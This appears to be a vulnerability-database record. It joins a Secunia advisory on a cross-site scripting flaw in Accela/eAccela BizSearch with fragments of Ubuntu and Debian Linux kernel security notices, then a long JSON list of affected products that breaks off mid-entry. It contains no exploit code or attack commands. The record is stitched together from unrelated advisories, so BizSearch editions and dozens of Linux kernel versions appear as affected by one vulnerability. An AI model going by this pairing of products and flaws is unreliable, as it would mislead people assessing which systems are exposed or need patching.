VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/45105/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=45105

RELEASE DATE: 2011-06-29

DISCUSS ADVISORY: http://secunia.com/advisories/45105/#comments

AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)

http://secunia.com/advisories/45105/

ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS

https://ca.secunia.com/?page=viewadvisory&vuln_id=45105

ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING

http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/

DESCRIPTION: A vulnerability has been reported in Accela / eAccela BizSearch, which can be exploited by malicious people to conduct cross-site scripting attacks.

Please see the vendor's advisory for the list of affected versions.

SOLUTION: Contact the vendor for patches.

PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.

ORIGINAL ADVISORY: Fujitsu (Japanese): http://software.fujitsu.com/jp/security/products-fujitsu/solution/bizsearch201103.html

JVN (English): http://jvndb.jvn.jp/en/contents/2010/JVNDB-2010-002807.html

OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/

EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/


About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


.

Software Description: - linux-ti-omap4: Linux kernel for OMAP4

Details:

Aristide Fattori and Roberto Paleari reported a flaw in the Linux kernel's handling of IPv4 icmp packets. (CVE-2010-4250)

An error was discovered in the kernel's handling of CUSE (Character device in Userspace). (CVE-2010-4650)

A flaw was found in the kernel's Integrity Measurement Architecture (IMA). Changes made by an attacker might not be discovered by IMA, if SELinux was disabled, and a new IMA rule was loaded. (CVE-2011-0006)

A flaw was found in the Linux Ethernet bridge's handling of IGMP (Internet Group Management Protocol) packets. (CVE-2011-1759)

Ben Hutchings reported a flaw in the kernel's handling of corrupt LDM partitions. (CVE-2011-2182)

A flaw was discovered in the Linux kernel's AppArmor security interface when invalid information was written to it. (CVE-2011-3619)

It was discovered that some import kernel threads can be blocked by a user level process. (CVE-2012-0038)

Chen Haogang discovered an integer overflow that could result in memory corruption. A local unprivileged user could use this to crash the system. (CVE-2012-0044)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 10.10: linux-image-2.6.35-903-omap4 2.6.35-903.32

After a standard system update you need to reboot your computer to make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-1394-1 CVE-2010-4250, CVE-2010-4650, CVE-2011-0006, CVE-2011-0716, CVE-2011-1476, CVE-2011-1477, CVE-2011-1759, CVE-2011-1927, CVE-2011-2182, CVE-2011-3619, CVE-2011-4621, CVE-2012-0038, CVE-2012-0044

Package Information: https://launchpad.net/ubuntu/+source/linux-ti-omap4/2.6.35-903.32 .

CVE-2011-1016

Marek Olšák discovered an issue in the driver for ATI/AMD Radeon video
chips.

This update also includes changes queued for the next point release of Debian 6.0, which also fix various non-security issues. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201206-0031",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.38.8"
      },
      {
        "model": "linux enterprise desktop",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "accela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "fujitsu",
        "version": "3.1/3.0"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v3.0l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v3.0l10a"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v3.0l12"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v3.1l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v3.2l10v"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v3.0l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v3.0l10a"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v3.0l12"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v3.1l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v3.2l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v3.0l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v3.0l10a"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v3.0l12"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v3.1l10"
      },
      {
        "model": "bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v3.2l10"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v1.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v2.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v2.0a"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v2.1"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "enterprise edition v2.1l12"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v1.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v2.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v2.0a"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v2.1"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v2.1a"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "standard edition v2.1l12"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v1.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v2.0"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v2.0a"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v2.1"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v2.1a"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "accela",
        "version": "workgroup edition v2.1l12"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.39"
      },
      {
        "model": "eaccela bizsearch",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "fujitsu",
        "version": "2.1/2.0/1.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.6,
        "vendor": "linux",
        "version": "2.6.38.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12"
      },
      {
        "model": "linux armel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.2"
      },
      {
        "model": "kernel 2.6.33-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux hppa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel 2.6.33-rc7",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.15"
      },
      {
        "model": "kernel 2.6.36-rc8",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.35-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise high availability extension sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.16"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.36"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.2"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.9"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.5"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.5"
      },
      {
        "model": "kernel -rc5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.6"
      },
      {
        "model": "kernel 2.6.33-rc6-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel 2.6.36-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.2"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.2"
      },
      {
        "model": "linux enterprise sdk sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.34.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.6"
      },
      {
        "model": "kernel 2.6.34-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.9"
      },
      {
        "model": "kernel 2.6.34-rc2",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.1"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.13"
      },
      {
        "model": "kernel 2.6.36-rc4",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.2"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.18"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22"
      },
      {
        "model": "linux enterprise desktop sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.8"
      },
      {
        "model": "kernel 2.6.35-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.23.6"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.5"
      },
      {
        "model": "kernel 2.6.35-rc5-git5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "linux enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.4"
      },
      {
        "model": "kernel 2.6.36-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.7"
      },
      {
        "model": "linux enterprise server sp4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel rc3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.12"
      },
      {
        "model": "kernel 2.6.34-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.4"
      },
      {
        "model": "kernel 2.6.24-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.1"
      },
      {
        "model": "enterprise mrg for red hat enterprise linux version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "v15"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.11"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.3"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15"
      },
      {
        "model": "linux alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.18.1"
      },
      {
        "model": "linux enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "linux lts lpia",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "8.04"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.12.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.6"
      },
      {
        "model": "kernel 2.6.33-rc6",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.2"
      },
      {
        "model": "kernel rc2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.10"
      },
      {
        "model": "kernel -rc4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.24"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.17.6"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.13"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.3"
      },
      {
        "model": "kernel 2.6.34-rc5",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.14.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.35.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.33.7"
      },
      {
        "model": "linux s/390",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "5.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.22.3"
      },
      {
        "model": "kernel 2.6.36-rc1",
        "scope": null,
        "trust": 0.3,
        "vendor": "linux",
        "version": null
      },
      {
        "model": "linux enterprise sdk sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.32.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.11.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.8.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.15.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
